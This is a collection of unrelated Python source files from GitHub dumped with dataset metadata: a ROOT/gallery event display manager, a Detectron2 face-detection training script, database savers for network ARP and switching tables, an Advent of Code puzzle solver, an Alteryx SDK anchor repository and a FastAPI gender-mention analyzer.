\\033[0m\")\n continue\n\n # Finally, ping the file to see what is available to draw\n self.pingFile(file)\n if len(self._keyTable['all']) > 0:\n self._hasFile = True\n _file_list.push_back(file)\n\n\n # Have to figure out number of events available\n for _f in _file_list:\n _rf = TFile(str(_f))\n _tree = _rf.Get(\"Events\")\n self._n_entries += _tree.GetEntries()\n _rf.Close()\n\n\n # Create an instance of the data manager:\n if _file_list.size() > 0:\n self._data_manager = gallery.Event(_file_list)\n\n # Open the manager\n self._lastProcessed = -1\n\n self.goToEvent(0)\n\n self.fileChanged.emit()\n\n\n def getStages(self):\n return self._keyTable.keys()\n\n # This function will return all producers for the given product\n def getProducers(self, product, stage = None):\n try:\n if stage is not None:\n return self._keyTable[stage][product]\n else:\n return self._keyTable[\"all\"][product]\n except:\n return None\n\n # This function returns the list of products that can be drawn:\n def getDrawableProducts(self):\n return self._drawableItems.getDict()\n\n # override the run,event,subrun functions:\n def run(self):\n if self._data_manager is None:\n return 0\n return self._data_manager.eventAuxiliary().run()\n\n def event(self):\n if self._data_manager is None:\n return 0\n return self._data_manager.eventAuxiliary().event()\n\n def subrun(self):\n if self._data_manager is None:\n return 0\n return self._data_manager.eventAuxiliary().subRun()\n\n def internalEvent(self):\n return self._event\n\n # override the functions from manager as needed here\n def next(self):\n # print \"Called next\"\n # Check that this isn't the last event:\n if self._event < self._n_entries - 1:\n self.goToEvent(self._event + 1)\n else:\n print(\"On the last event, can't go to next.\")\n\n def prev(self):\n if self._event != 0:\n self.goToEvent(self._event - 1)\n else:\n print(\"On the first event, can't go to previous.\")\n\n def processEvent(self, force=False):\n if self._lastProcessed != self._event or force:\n self._processer.process_event(self._data_manager)\n self._lastProcessed = self._event\n\n def goToEvent(self, event, subrun=None, run=None, force=False):\n # Gallery events don't offer random access\n\n # if rubrun and run are specified, then we are dealing with real (event, subrun, run)\n # not an event index as usual. So first of all go from (event, subrun, run) to event index\n if subrun is not None and run is not None:\n try:\n item = {'run': run, 'subrun': subrun, 'event': event}\n except:\n print('This combination does not exist:', item)\n return\n event = self._run_list.index(item)\n\n\n # Loop through until the event is gotten:\n if event < self._n_entries:\n if event == self._event + 1:\n self._data_manager.next()\n\n else:\n if event > self._event:\n while event != self._data_manager.eventEntry():\n self._data_manager.next()\n else:\n self._data_manager.toBegin()\n while event != self._data_manager.eventEntry():\n self._data_manager.next()\n else:\n print(f\"Selected event is too high. 
You have requested event {event}, but there is a maximum of {self._n_entries}.\")\n return\n\n self.setEvent(self._data_manager.eventEntry())\n self.processEvent()\n\n # if self._view_manager != None:\n # self._view_manager.drawPlanes(self)\n self.drawFresh()\n self.eventChanged.emit()\n\n\n\nclass evd_manager_2D(evd_manager_base):\n\n # truthLabelChanged = QtCore.pyqtSignal(str)\n filterNoise = False\n\n '''\n Class to handle the 2D specific aspects of viewer\n '''\n\n def __init__(self, geom, file=None):\n super(evd_manager_2D, self).__init__(geom, file)\n self._drawableItems = datatypes.drawableItems()\n\n # this function is meant for the first request to draw an object or\n # when the producer changes\n def redrawProduct(self, informal_type, product, view_manager):\n # print \"Received request to redraw \", product, \" by \",producer\n # First, determine if there is a drawing process for this product:\n if product is None:\n if informal_type in self._drawnClasses:\n self._drawnClasses[informal_type].clearDrawnObjects(self._view_manager)\n self._drawnClasses.pop(informal_type)\n return\n if informal_type in self._drawnClasses:\n self._drawnClasses[informal_type].setProducer(product.fullName())\n self.processEvent(True)\n self._drawnClasses[informal_type].clearDrawnObjects(self._view_manager)\n if informal_type == 'MCTrack' or informal_type == 'Track':\n self._drawnClasses[informal_type].drawObjects(self._view_manager, self._gui._tracksOnBothTPCs)\n else:\n self._drawnClasses[informal_type].drawObjects(self._view_manager)\n return\n\n # Now, draw the new product\n if informal_type in self._drawableItems.getListOfTitles():\n # drawable items contains a reference to the class, so instantiate\n # it\n drawingClass = self._drawableItems.getDict()[informal_type][0](self._geom)\n # Special case for clusters, connect it to the signal:\n # if name == 'Cluster':\n # self.noiseFilterChanged.connect(\n # drawingClass.setParamsDrawing)\n # drawingClass.setParamsDrawing(self._drawParams)\n # if name == 'Match':\n # self.noiseFilterChanged.connect(\n # drawingClass.setParamsDrawing)\n # drawingClass.setParamsDrawing(self._drawParams)\n if informal_type == \"RawDigit\":\n self.noiseFilterChanged.connect(\n drawingClass.runNoiseFilter)\n drawingClass.SetSubtractPdedestal(True)\n\n drawingClass.setProducer(product.fullName())\n self._processer.add_process(product, drawingClass._process)\n self._drawnClasses.update({informal_type: drawingClass})\n # Need to process the event\n self.processEvent(True)\n if informal_type == 'MCTrack' or informal_type == 'Track':\n drawingClass.drawObjects(self._view_manager, self._gui._tracksOnBothTPCs)\n else:\n drawingClass.drawObjects(self._view_manager)\n\n def clearAll(self):\n for recoProduct in self._drawnClasses:\n self._drawnClasses[recoProduct].clearDrawnObjects(\n self._view_manager)\n # self.clearTruth()\n\n def drawFresh(self):\n # # wires are special:\n if self._drawWires:\n self._view_manager.drawPlanes(self)\n self.clearAll()\n # Draw objects in a specific order defined by drawableItems\n order = self._drawableItems.getListOfTitles()\n # self.drawTruth()\n for item in order:\n if item in self._drawnClasses:\n self._drawnClasses[item].drawObjects(self._view_manager)\n\n def getAutoRange(self, plane):\n # This gets the max bounds\n xRangeMax, yRangeMax = super(evd_manager_2D, self).getAutoRange(plane)\n xRange = [999,-999]\n yRange = [99999,-99999]\n for process in self._drawnClasses:\n x, y = self._drawnClasses[process].getAutoRange(plane)\n # Check against 
all four of the parameters:\n if x is not None:\n if x[0] < xRange[0]:\n xRange[0] = x[0]\n if x[1] > xRange[1]:\n xRange[1] = x[1]\n if y is not None:\n if y[0] < yRange[0]:\n yRange[0] = y[0]\n if y[1] > yRange[1]:\n yRange[1] = y[1]\n\n # Pad the ranges by 1 cm to accommodate\n padding = 5\n xRange[0] = max(xRangeMax[0], xRange[0] - padding/self._geom.wire2cm())\n xRange[1] = min(xRangeMax[1], xRange[1] + padding/self._geom.wire2cm())\n yRange[0] = max(yRangeMax[0], yRange[0] - padding/self._geom.time2cm())\n yRange[1] = min(yRangeMax[1], yRange[1] + padding/self._geom.time2cm())\n return xRange, yRange\n\n def get_products(self, name, stage=None):\n '''\n Returns all available products\n '''\n if stage is None:\n stage = 'all'\n\n if stage not in self._keyTable:\n return None\n\n if name not in self._keyTable[stage]:\n return None\n\n return self._keyTable[stage][name]\n\n def get_default_products(self, name, stage=None):\n '''\n Returns only the products that will be\n drawn by default, unless the user decides what to see\n in the dropdown menu\n '''\n if stage is None:\n stage = 'all'\n\n if stage not in self._keyTable:\n return None\n\n if name not in self._keyTable[stage]:\n return None\n\n if self._geom.name() == 'icarus' and len(self._keyTable[stage][name]) > 3:\n default_products = [self._keyTable[stage][name][0],\n self._keyTable[stage][name][1],\n self._keyTable[stage][name][2],\n self._keyTable[stage][name][3]]\n else:\n default_products = [self._keyTable[stage][name][0]]\n\n return default_products\n\n # handle all the wire stuff:\n def toggleWires(self, product, stage=None, subtract_pedestal=True, producers=None):\n # Now, either add the drawing process or remove it:\n\n if stage is None:\n stage = 'all'\n\n if product == 'wire':\n if 'recob::Wire' not in self._keyTable[stage]:\n print(\"No wire data available to draw\")\n self._drawWires = False\n return\n self._drawWires = True\n self._wireDrawer = datatypes.recoWire(self._geom)\n\n if producers is not None:\n producer = producers\n elif self._geom.name() == 'icarus' and len(self._keyTable[stage]['recob::Wire']) > 3:\n producer = [self._keyTable[stage]['recob::Wire'][0].fullName(),\n self._keyTable[stage]['recob::Wire'][1].fullName(),\n self._keyTable[stage]['recob::Wire'][2].fullName(),\n self._keyTable[stage]['recob::Wire'][3].fullName()]\n else:\n producer = self._keyTable[stage]['recob::Wire'][0].fullName()\n\n # self._wireDrawer.setProducer(self._keyTable[stage]['recob::Wire'][0].fullName())\n self._wireDrawer.setProducer(producer)\n self._processer.add_process(\"recob::Wire\",self._wireDrawer._process)\n self.processEvent(True)\n\n elif product == 'rawdigit':\n if 'raw::RawDigit' not in self._keyTable[stage]:\n print(\"No raw digit data available to draw\")\n self._drawWires = False\n return\n self._drawWires = True\n self._wireDrawer = datatypes.rawDigit(self._geom)\n self._wireDrawer.setSubtractPedestal(subtract_pedestal)\n\n if producers is not None:\n producer = producers\n elif self._geom.name() == 'icarus' and len(self._keyTable[stage]['raw::RawDigit']) > 3:\n producer = [self._keyTable[stage]['raw::RawDigit'][0].fullName(),\n self._keyTable[stage]['raw::RawDigit'][1].fullName(),\n self._keyTable[stage]['raw::RawDigit'][2].fullName(),\n self._keyTable[stage]['raw::RawDigit'][3].fullName()]\n else:\n producer = self._keyTable[stage]['raw::RawDigit'][0].fullName()\n\n self._wireDrawer.setProducer(producer)\n self._processer.add_process(\"raw::RawDigit\", self._wireDrawer._process)\n 
self._wireDrawer.toggleNoiseFilter(self.filterNoise)\n\n self.processEvent(True)\n else:\n if 'raw::RawDigit' in self._processer._ana_units.keys():\n self._processer.remove_process('raw::RawDigit')\n if 'recob::Wire' in self._processer._ana_units.keys():\n self._processer.remove_process('recob::Wire')\n self._wireDrawer = None\n self._drawWires = False\n\n def toggleNoiseFilter(self, filterBool):\n self.filterNoise = filterBool\n if 'raw::RawDigit' in self._processer._ana_units.keys():\n self._wireDrawer.toggleNoiseFilter(self.filterNoise)\n # Rerun the event just for the raw digits:\n self.processEvent(force=True)\n self.drawFresh()\n\n def toggleOpDetWvf(self, product, stage=None):\n\n if stage is None:\n stage = 'all'\n\n if product == 'opdetwaveform':\n\n if 'raw::OpDetWaveform' not in self._keyTable[stage]:\n print(\"No OpDetWaveform data available to draw\")\n self._drawWires = False\n return\n self._drawOpDetWvf = True\n self._opDetWvfDrawer = datatypes.opdetwaveform(self._geom)\n self._opDetWvfDrawer.setProducer(self._keyTable[stage]['raw::OpDetWaveform'][0].fullName())\n self._processer.add_process(\"raw::OpDetWaveform\",self._opDetWvfDrawer._process)\n self.processEvent(True)\n\n\n def getPlane(self, plane, cryo=0):\n if self._drawWires:\n return self._wireDrawer.getPlane(plane, cryo)\n\n def getOpDetWvf(self):\n if self._drawOpDetWvf:\n return self._opDetWvfDrawer.getData()\n\n def hasWireData(self):\n if self._drawWires:\n return True\n else:\n return False\n\n def hasOpDetWvfData(self):\n if self._drawOpDetWvf:\n return True\n else:\n return False\n\n def drawHitsOnWire(self, plane, wire, tpc):\n if not 'Hit' in self._drawnClasses:\n return\n else:\n # Get the right plane number\n this_plane = plane\n if tpc == 1:\n this_plane = self._geom.planeMix()[plane][0]\n\n # Get the hits:\n hits = self._drawnClasses['Hit'].getHitsOnWire(this_plane, wire)\n self._view_manager.drawHitsOnPlot(hits)\n\n\ntry:\n import pyqtgraph.opengl as gl\n\n class evd_manager_3D(evd_manager_base):\n\n \"\"\"This class handles file I/O and drawing for 3D viewer\"\"\"\n\n showMCCosmic = True\n\n def __init__(self, geom, file=None):\n super(evd_manager_3D, self).__init__(geom, file)\n self._drawableItems = datatypes.drawableItems3D()\n\n def getAutoRange(self):\n pass\n\n # this function is meant for the first request to draw an object or\n # when the producer changes\n def redrawProduct(self, name, product, producer, view_manager, stage = None):\n # print \"Received request to redraw \", product, \" by \",producer, \" with name \", name\n # First, determine if there is a drawing process for this product:\n if stage is None:\n stage = 'all'\n if producer is None:\n if name in self._drawnClasses:\n self._drawnClasses[name].clearDrawnObjects(self._view_manager)\n self._drawnClasses.pop(name)\n return\n if name in self._drawnClasses:\n self._drawnClasses[name].setProducer(producer)\n self.processEvent(True)\n self._drawnClasses[name].clearDrawnObjects(self._view_manager)\n self._drawnClasses[name].drawObjects(self._view_manager)\n return\n\n\n # Now, draw the new product\n if name in self._drawableItems.getListOfTitles():\n # drawable items contains a reference to the class, so\n # instantiate it\n drawingClass=self._drawableItems.getDict()[name][0]()\n # Special case for clusters, connect it to the signal:\n # if name is 'PFParticle':\n # self.noiseFilterChanged.connect(\n # drawingClass.setParamsDrawing)\n # drawingClass.setParamsDrawing(self._drawParams)\n # if name == 'Match':\n # 
self.noiseFilterChanged.connect(\n # drawingClass.setParamsDrawing)\n # drawingClass.setParamsDrawing(self._drawParams)\n\n drawingClass.setProducer(producer)\n self._processer.add_process(product, drawingClass._process)\n self._drawnClasses.update({name: drawingClass})\n if name == \"MCTrack\":\n self._drawnClasses[name].toggleMCCosmic(self.showMCCosmic)\n # Need to process the event\n self.processEvent(True)\n drawingClass.drawObjects(self._view_manager)\n\n def clearAll(self):\n for recoProduct in self._drawnClasses:\n self._drawnClasses[recoProduct].clearDrawnObjects(\n self._view_manager)\n\n # def toggleParams(self, paramsBool):\n # self._drawParams=paramsBool\n # self.noiseFilterChanged.emit(paramsBool)\n # if 'PFParticle' in self._drawnClasses:\n # self.drawFresh()\n\n def drawFresh(self):\n # # wires are special:\n # if self._drawWires:\n # self._view_manager.drawPlanes(self)\n self.clearAll()\n # Draw objects in a specific order defined by drawableItems\n order=self._drawableItems.getListOfTitles()\n for item in order:\n if item in self._drawnClasses:\n self._drawnClasses[item].drawObjects(self._view_manager)\n\n def toggleMCCosmic(self, toggleBool):\n self.showMCCosmic = toggleBool\n order=self._drawableItems.getListOfTitles()\n for item in order:\n if item == \"MCTrack\":\n if item in self._drawnClasses:\n self._drawnClasses[item].toggleMCCosmic(toggleBool)\n self._drawnClasses[item].clearDrawnObjects(self._view_manager)\n self.processEvent(True)\n self._drawnClasses[item].drawObjects(self._view_manager)\n #self.drawFresh()\n\nexcept:\n pass\n","repo_name":"TITUS-EVD/gallery-framework","sub_path":"UserDev/EventDisplay/python/evdmanager/evdmanager.py","file_name":"evdmanager.py","file_ext":"py","file_size_in_byte":27479,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"37667070300","text":"\"\"\"\nWe trained our model on Google Colab with a subscription to Google Colab Pro+ and gained access to a high-end GPU which\nshortened the training time significantly. 
The link to the python notebook on Google Colab is attached below.\nhttps://colab.research.google.com/drive/1jBf1FECDkiGMPl0EorSVa7OcFVUfA2m7?usp=sharing\n\nNote that you can also run the training code on your local device if you have a high-end GPU which will produce the\nsame output.\n\"\"\"\n\n\nimport os\n\nfrom detectron2 import model_zoo\nfrom detectron2.config import get_cfg\nfrom detectron2.data import DatasetCatalog, MetadataCatalog\nfrom detectron2.engine import DefaultTrainer\nfrom detectron2.evaluation import COCOEvaluator\nfrom detectron2.utils.logger import setup_logger\n\nfrom custom_datasets_conversion import create_annotations_data_frame, convert_dataset_dicts\n\n\nclass CocoTrainer(DefaultTrainer):\n \"\"\"\n This is a custom trainer class that inherits the default trainer class of Detectron2 for model training purpose.\n \"\"\"\n @classmethod\n def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n if output_folder is None:\n os.makedirs('coco_evaluation', exist_ok=True)\n output_folder = 'coco_evaluation'\n\n return COCOEvaluator(dataset_name, cfg, False, output_folder)\n\n\n# Enable Detectron2 logger to generate output in terminal for debugging purpose\nsetup_logger()\n\n# Initialize the 'face' class for object detection\nclasses = ['face']\n\n# Create data frame for training and validation steps during model training for DroneFace and Person Faces datasets\ndroneFace_training_data_frame = create_annotations_data_frame('../droneFace_dataset/train/_annotations.coco.json', 'face')\ndroneFace_validation_data_frame = create_annotations_data_frame('../droneFace_dataset/valid/_annotations.coco.json', 'face')\n\nperson_faces_training_data_frame = create_annotations_data_frame('../person_faces_dataset/train/_annotations.coco.json', 'face')\nperson_faces_validation_data_frame = create_annotations_data_frame('../person_faces_dataset/valid/_annotations.coco.json', 'face')\n\n# Register training and validation datasets and its respective metadata\nfor i in ['train', 'valid']:\n DatasetCatalog.register('droneFace_' + i + '_dataset', lambda i=i: convert_dataset_dicts(\n droneFace_training_data_frame if i == 'train' else droneFace_validation_data_frame, classes,\n '../droneFace_dataset/' + i))\n MetadataCatalog.get('droneFace_' + i + '_dataset').set(thing_classes=classes)\n\n DatasetCatalog.register('person_faces_' + i + '_dataset', lambda i=i: convert_dataset_dicts(\n person_faces_training_data_frame if i == 'train' else person_faces_validation_data_frame, classes,\n '../person_faces_dataset/' + i))\n MetadataCatalog.get('person_faces_' + i + '_dataset').set(thing_classes=classes)\n\n# Initialize settings for training\ncfg = get_cfg()\n\n# Here we are using COCO Instance Segmentation Baselines with Mask R-CNN (R50-FPN) pre-trained model from Detectron2\n# Model Zoo\n# https://github.com/facebookresearch/detectron2/blob/main/configs/COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\ncfg.merge_from_file(model_zoo.get_config_file('COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml'))\ncfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url('COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml')\n\n# Assign registered datasets in config setting\ncfg.DATASETS.TRAIN = ('droneFace_train_dataset', 'person_faces_train_dataset')\ncfg.DATASETS.TEST = ('droneFace_valid_dataset', 'person_faces_valid_dataset')\n\n# The config attributes below are fine-tuned for our face detection model\ncfg.DATALOADER.NUM_WORKERS = 1\ncfg.SOLVER.BASE_LR = 0.0005\ncfg.SOLVER.WARMUP_ITERS = 2075\n# Total 
training images - 4150\ncfg.SOLVER.IMS_PER_BATCH = 4\ncfg.SOLVER.MAX_ITER = 20750\ncfg.SOLVER.STEPS = [8300, 9337, 10374, 11411, 12448, 13485, 14522, 15559, 16596, 17633]\ncfg.SOLVER.GAMMA = 0.6\ncfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 128\ncfg.MODEL.ROI_HEADS.NUM_CLASSES = len(classes)\ncfg.TEST.EVAL_PERIOD = 4150\n# cfg.MODEL.DEVICE = 'cpu' # Uncomment this line if your device does not have a CUDA compatible GPU\n\nos.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\n\n# Initialise COCO trainer and start training with the registered training dataset\ntrainer = CocoTrainer(cfg)\ntrainer.resume_or_load(resume=False)\ntrainer.train()\n","repo_name":"ChangHorng/drone-based_face_detection_and_recognition","sub_path":"face_detection/train/face_detection_model_training.py","file_name":"face_detection_model_training.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"16668230900","text":"import pandas as pd\r\nfrom model.model_db import *\r\nfrom properties.properties import DataBaseProps\r\nfrom datetime import datetime \r\nfrom pprint import pprint as pp \r\n\r\n \r\ndef save_arp_table(device_ip, df_table):\r\n ''' Push received device arp table to database'''\r\n with Session() as session:\r\n # arp_objects = []\r\n try:\r\n for index, row in df_table.iterrows():\r\n arp_row = ArpTable(\r\n mac_address = row['mac_address'],\r\n ip_address = row['ip_address'],\r\n interface_name = row['interface_name'],\r\n ip_source = device_ip,\r\n date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n )\r\n session.merge(arp_row)\r\n # print(arp_row)\r\n session.commit()\r\n except Exception as e:\r\n print(\"EXCEPTION on save_arp_table => \", e)\r\n \r\n session.close()\r\n\r\ndef save_ethernet_switching_table(device_ip, df_table):\r\n ''' Push received device ethernet-switching table to database'''\r\n with Session() as session:\r\n try:\r\n es_objects = []\r\n for index, row in df_table.iterrows():\r\n es_row = EthernetSwitchingTable(\r\n mac_address = row['mac_address'],\r\n vlan = row['vlan_name'],\r\n logical_interface = row['logical_interface'],\r\n ip_source = device_ip,\r\n date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n )\r\n session.merge(es_row)\r\n # print(es_row)\r\n session.commit()\r\n \r\n except Exception as e:\r\n print(\"EXCEPTION on save_ethernet_switching_table => \", e)\r\n \r\n session.close()\r\n\r\n\r\ndef save_interfaces_table(device_ip, in_table):\r\n ''' Push received device interfaces table to database'''\r\n with Session() as session:\r\n try:\r\n for index, row in in_table.iterrows():\r\n in_row = InterfacesTable(\r\n interface = row['interface'],\r\n description = row['description'],\r\n ip_source = device_ip,\r\n date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n )\r\n session.merge(in_row)\r\n # print(in_row)\r\n session.commit()\r\n\r\n except Exception as e:\r\n print(\"EXCEPTION on save_interfaces_table => \", e)\r\n\r\n session.close()\r\n\r\ndef save_neighbors_table(device_ip, ne_table):\r\n ''' Push received device neighbors table to database'''\r\n with Session() as session:\r\n try:\r\n for index, row in ne_table.iterrows():\r\n in_row = NeighborsTable(\r\n local_interface = row['local_interface'],\r\n device_id = row['device_id'],\r\n port_info = row['port_info'],\r\n ip_source = device_ip,\r\n date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n )\r\n session.merge(in_row)\r\n # print(in_row)\r\n session.commit()\r\n\r\n except Exception as e:\r\n 
print(\"EXCEPTION on save_interfaces_table => \", e)\r\n\r\n session.close()","repo_name":"psitadmin/network-junco","sub_path":"server/build/lib/arp_service/arp_db.py","file_name":"arp_db.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1885529575","text":"\nfrom structpy import specification\n\n\n@specification\nclass SpanSpec:\n \"\"\"\n Span gives the string data, and start (inclusive) and end (exclusive)\n token indices of the span within its larger text.\n\n Span also requires turn and sentence indices, as well as speaker id.\n Sentence indices are global.\n \"\"\"\n\n @specification.init\n def SPAN(Span):\n full_string = 'I love my dog Fido'\n return Span('my dog', 2, 4, 0, 0, 1, 'my dog')\n\n\n","repo_name":"emora-chat/GRIDD","sub_path":"data_structures/span_spec.py","file_name":"span_spec.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38164830586","text":"import os\r\nimport re\r\n\r\nfrom collections import namedtuple\r\nfrom itertools import combinations_with_replacement, permutations\r\n\r\n\r\nwith open(os.path.join(os.path.dirname(__file__), f\"inputs/day15_input.txt\")) as f:\r\n actual_input = f.read()\r\n\r\nsample_input = \"\"\"Butterscotch: capacity -1, durability -2, flavor 6, texture 3, calories 8\r\nCinnamon: capacity 2, durability 3, flavor -2, texture -1, calories 3\r\n\"\"\"\r\n\r\nregex = re.compile(\r\n r\"^(\\w+): capacity ([-]?\\d+), durability ([-]?\\d+), flavor ([-]?\\d+), texture ([-]?\\d+), calories ([-]?\\d+)$\"\r\n)\r\n\r\nIngredient = namedtuple(\"Ingredient\", \"capacity durability flavor texture calories\")\r\n\r\n\r\ndef solve(inputs):\r\n ingredients = {}\r\n for data in (regex.match(line).groups() for line in inputs.splitlines()):\r\n ingredients[data[0]] = Ingredient(*(int(c) for c in data[1:]))\r\n\r\n weight_combos = [\r\n r\r\n for r in combinations_with_replacement(range(101), len(ingredients) - 1)\r\n if sum(r) <= 100\r\n ]\r\n\r\n def max_score(calorie_count=None):\r\n max_score = 0\r\n for weights in weight_combos:\r\n recipes = permutations([w for w in weights] + [100 - sum(weights)])\r\n for r in recipes:\r\n capacity, durability, flavor, texture, calories = 0, 0, 0, 0, 0\r\n for ingredient, w in zip(ingredients.values(), r):\r\n capacity += w * ingredient.capacity\r\n durability += w * ingredient.durability\r\n flavor += w * ingredient.flavor\r\n texture += w * ingredient.texture\r\n calories += w * ingredient.calories\r\n score = (\r\n max(capacity, 0)\r\n * max(durability, 0)\r\n * max(flavor, 0)\r\n * max(texture, 0)\r\n )\r\n if calorie_count is None or calories == calorie_count:\r\n max_score = max(score, max_score)\r\n return max_score\r\n\r\n print(f\"Part 1: {max_score()}\")\r\n print(f\"Part 2: {max_score(calorie_count=500)}\\n\")\r\n\r\n\r\nsolve(sample_input)\r\nsolve(actual_input)","repo_name":"gid/AoC","sub_path":"Archive/2015/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27119313893","text":"import logging\nfrom typing import Dict, List, TYPE_CHECKING, cast\n\nfrom ayx_python_sdk.providers.amp_provider.builders.input_anchor_builder import (\n InputAnchorBuilder,\n)\nfrom ayx_python_sdk.providers.amp_provider.repositories.input_connection_repository import (\n 
InputConnectionRepository,\n)\nfrom ayx_python_sdk.providers.amp_provider.repositories.singleton import Singleton\n\nif TYPE_CHECKING:\n from ayx_python_sdk.providers.amp_provider.amp_input_anchor import AMPInputAnchor\n from ayx_python_sdk.providers.amp_provider.resources.generated.incoming_anchor_pb2 import (\n IncomingAnchor as ProtobufInputAnchor,\n )\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass InputAnchorRepository(metaclass=Singleton):\n \"\"\"Class defines methods and properties to read/write/delete input anchors.\"\"\"\n\n def __init__(self) -> None:\n self._repository: Dict[str, \"AMPInputAnchor\"] = {}\n\n def save_grpc_anchor(self, input_anchor: \"ProtobufInputAnchor\") -> None:\n \"\"\"\n Convert an Input Anchor from Protobuf to AMP and saves it to the repository.\n\n Parameters\n ----------\n input_anchor\n The protobuf representation of an input anchor to be saved.\n \"\"\"\n core_input_anchor = InputAnchorBuilder.from_protobuf(input_anchor)\n self.save_anchor(core_input_anchor)\n\n def save_anchor(self, anchor: \"AMPInputAnchor\") -> None:\n \"\"\"\n Save AMP input anchor to repository.\n\n Parameters\n ----------\n anchor\n The AMPInputAnchor to be saved.\n \"\"\"\n from ayx_python_sdk.providers.amp_provider import AMPInputConnection\n\n logger.debug(\"Saving Input Anchor %s to repository\", anchor.name)\n self._repository[anchor.name] = anchor\n logger.debug(\"Current InputAnchorRepository State: %s\", self._repository)\n\n connections = cast(List[AMPInputConnection], anchor.connections)\n for connection in connections:\n InputConnectionRepository().save_connection(anchor.name, connection)\n\n def get_anchor(self, anchor_name: str) -> \"AMPInputAnchor\":\n \"\"\"\n Retrieve InputAnchor object associated with the anchor name.\n\n Parameters\n ----------\n anchor_name\n The name of the anchor to fetch from the repository.\n\n Returns\n -------\n The input anchor object with corresponding name.\n \"\"\"\n if anchor_name in self._repository:\n return self._repository[anchor_name]\n else:\n raise ValueError(f\"Anchor {anchor_name} does not exist\")\n\n def delete_anchor(self, anchor_name: str) -> None:\n \"\"\"\n Delete InputAnchor object associated with the anchor name.\n\n Parameters\n ----------\n anchor_name\n The name of the anchor to delete from the repository.\n \"\"\"\n if anchor_name in self._repository:\n logger.debug(\"Removing Input Anchor %s from repository\", anchor_name)\n del self._repository[anchor_name]\n logger.debug(\"Current InputAnchorRepository State: %s\", self._repository)\n else:\n raise ValueError(f\"Anchor {anchor_name} does not exist\")\n\n def clear_repository(self) -> None:\n \"\"\"Delete all data in the repository.\"\"\"\n logger.debug(\"Clearing InputAnchorRepository\")\n self._repository = {}\n","repo_name":"beesechuuuuurger/gptayx","sub_path":".ayx_cli.cache/dist/ayx_python_sdk/providers/amp_provider/repositories/input_anchor_repository.py","file_name":"input_anchor_repository.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11163223817","text":"from fastapi import FastAPI, Request\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nfrom pydantic import BaseModel\nfrom typing import List\nfrom transformers import pipeline, AutoTokenizer, AutoModelForTokenClassification, AutoModelForSequenceClassification\nimport logging\nimport re\nfrom 
nltk.tokenize import sent_tokenize\nimport nltk\nimport pandas as pd\nfrom tqdm import tqdm\nimport os\nfrom fastapi import HTTPException # needed by the classify_sentences error handler below\ntqdm.pandas()\n\nnltk.download(\"punkt\")\n\n\nlogging.basicConfig(level=logging.INFO)\n\napp = FastAPI()\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n\ntemplates = Jinja2Templates(directory=\"templates\")\n\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def root(request: Request):\n    return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\n\nclass TextToAnalyze(BaseModel):\n    text: str\n\n\nclass AnalysisResult(BaseModel):\n    male_to_female_ratio: float\n    female_to_male_ratio: float\n\nclass TextAnalysisResult(BaseModel):\n    sentence_list: List[str]\n\nclass Sentences(BaseModel):\n    sentences: List[str]\n\n\ndef load_model_and_tokenizer(model_name: str, model_dir: str):\n    model_path = os.path.join(model_dir, \"pytorch_model.bin\")\n    tokenizer_path = os.path.join(model_dir, \"tokenizer.json\")\n\n    if not (os.path.exists(model_path) and os.path.exists(tokenizer_path)):\n        print(\"Downloading model and tokenizer from Hugging Face...\")\n        model = AutoModelForSequenceClassification.from_pretrained(model_name)\n        tokenizer = AutoTokenizer.from_pretrained(model_name)\n        model.save_pretrained(model_dir)\n        tokenizer.save_pretrained(model_dir)\n    else:\n        print(\"Loading model and tokenizer from local folder...\")\n        model = AutoModelForSequenceClassification.from_pretrained(model_dir)\n        tokenizer = AutoTokenizer.from_pretrained(model_dir)\n\n    return model, tokenizer\n\n\ndef count_gender_mentions(text: str) -> tuple:\n    male_mentions = sum(\n        [\n            1 for word in re.findall(\n                r'\\b\\w+\\b',\n                text.lower()) if word in (\n                'he',\n                'him',\n                'his',\n                'man',\n                'men',\n                'gentleman',\n                'gentlemen')])\n    female_mentions = sum(\n        [\n            1 for word in re.findall(\n                r'\\b\\w+\\b',\n                text.lower()) if word in (\n                'she',\n                'her',\n                'hers',\n                'woman',\n                'women',\n                'lady',\n                'ladies')])\n\n    return male_mentions, female_mentions\n\n\n@app.post(\"/analyze\", response_model=AnalysisResult)\nasync def analyze_endpoint(text_to_analyze: TextToAnalyze):\n    male_mentions, female_mentions = count_gender_mentions(text_to_analyze.text)\n\n    logging.info(\n        f\"Male mentions: {male_mentions}, Female mentions: {female_mentions}\")\n\n    # guard each denominator: a zero count would otherwise raise ZeroDivisionError\n    if female_mentions == 0:\n        m_ratio = float('inf') if male_mentions > 0 else 1.0\n    else:\n        m_ratio = male_mentions / female_mentions\n\n    if male_mentions == 0:\n        f_ratio = float('inf') if female_mentions > 0 else 1.0\n    else:\n        